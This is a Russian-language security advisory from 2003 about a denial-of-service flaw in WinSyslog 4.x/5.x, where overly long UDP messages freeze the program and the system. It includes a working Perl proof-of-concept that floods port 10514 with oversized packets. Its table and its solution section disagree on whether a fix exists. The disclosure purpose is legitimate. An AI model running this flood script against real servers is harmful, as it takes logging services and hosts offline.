| Дата публикации: | 15.10.2003 |
| Всего просмотров: | 1350 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
WinSyslog 4.x
WinSyslog 5.x |
| Уязвимые версии: WinSyslog version 4.21 SP1
Описание: Уязвимость обнаружена в WinSyslog. Удаленный атакующий может заверсить работу приложения и системы. Удаленный атакующий может послать чрезмерно длинное сообщение к WinSyslog программе, чтобы завесить работу WinSyslog и операционной системы. Пример/Эксплоит:
#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability
use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
for ($count = 0; $count < 1000; $count ++)
{
$buf = "";
$buf .= "A"x((600+$count)*4);
print "Length: ", length($buf), "\n";
send($socket, $buf, 0, $portaddr);
print "sent\n";
}
print "Done\n";
URL производителя:http://WinSyslog.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к программе только из доверенных IP адресов. |